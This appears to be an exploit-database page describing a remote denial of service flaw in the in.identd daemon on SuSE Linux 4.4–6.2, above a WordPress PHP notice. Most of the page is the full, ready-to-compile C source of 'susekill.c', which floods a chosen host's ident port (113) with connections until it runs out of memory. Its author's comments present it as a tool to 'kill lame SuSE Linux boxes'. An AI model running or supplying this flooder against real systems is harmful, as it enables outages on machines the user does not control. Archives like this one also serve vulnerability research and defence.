Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
SuSE Linux in.identd Remote Denial of Service Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
SuSE Linux
by:
friedolin
7.5
CVSS
HIGH
Remote Denial of Service
CWE
Product Name: SuSE Linux
Affected Version From: SuSE-Linux 4.4
Affected Version To: SuSE-Linux 6.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: SuSE-Linux 4.4 - 6.2, Slackware 3.2 and 3.6

SuSE Linux in.identd Remote Denial of Service Vulnerability

The in.identd daemon in SuSE Linux is vulnerable to a remote denial of service attack. By sending a large number of ident requests in a short period of time, an attacker can force the target machine to start multiple daemons, eventually causing the machine to run out of memory and halt.

Mitigation:

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/587/info

In the inetd.conf under certain distributions of SuSE Linux the in.identd daemon is started with the -w -t120 option. This means that one identd process waits 120 seconds after answering the first request to answer the next request. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons because the initial daemon is in a time wait state. This can eventually lead the machine to starve itself of memory resulting essentially in a machine halt.

/* susekill.c by friedolin
 * 
 * used to kill lame SuSE Linux boxes with identd running
 * identd must be started with -w -t120 to crash a machine
 *
 * have fun, friedolin <hendrik@scholz.net>
 *
 * based on gewse.c by napster
 */

/* Tested systems:
 *
 * vulnerable:
 *
 *  SuSE-Linux 4.4 - 6.2
 *  Slackware  3.2 and 3.6
 *
 * not vulnerable:
 *
 *  RedHat 5.0 - 6.0 
 *  Debian 2.0 - 2.1
 * 
 * not tested:
 *
 *  pre 4.3 SuSE systems
 *  pre 5.0 RedHat
 *  pre 2.0 Debian
 *  other Slackware releases
 *  Caldera Open Linux, ...
 *
 * please send me your results and experiences !
 * 
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>

#define GETIDENT "1027, 6667 : USERID : UNIX : killsuse"

int sockdesc;
int portkill;
int numkill;
int x;

void usage(char *progname)
{
  printf("susekill by friedolin (based on gewse.c)\n");
  printf("usage: %s <host> <# of connections>\n",progname);
  exit(69);
}

main(int argc, char *argv[])
{
    
 struct sockaddr_in sin;
 struct hostent *he;

 if (argc<3) usage(argv[0]);
  
 sin.sin_port = htons(113);
 sin.sin_family = AF_INET;
 
 he = gethostbyname(argv[1]);
 if (he) {
   sin.sin_family = AF_INET;
   sin.sin_port = htons(113);
   memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length);
 } else {
   perror("resolving");
 }

 numkill  = atoi(argv[2]);

 printf("Flooding %s [%s] identd %d times.\n", argv[1], inet_ntoa(sin.sin_addr.s_addr), numkill);
 printf("Killing");
 fflush(stdout);

 for (x=1;x<=numkill;x++) {

 sockdesc = socket(AF_INET, SOCK_STREAM, 0);

 if (sockdesc < 0) {
  perror("socket");
  exit(69);
 }
  
  if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
   perror("connect");
   exit(69);
  }

  printf(" .");
  fflush(stdout);
  (void) write(sockdesc, GETIDENT, strlen(GETIDENT));
 }

 printf("\n");

}

Navigation

Suggest Exploit

Services By CQR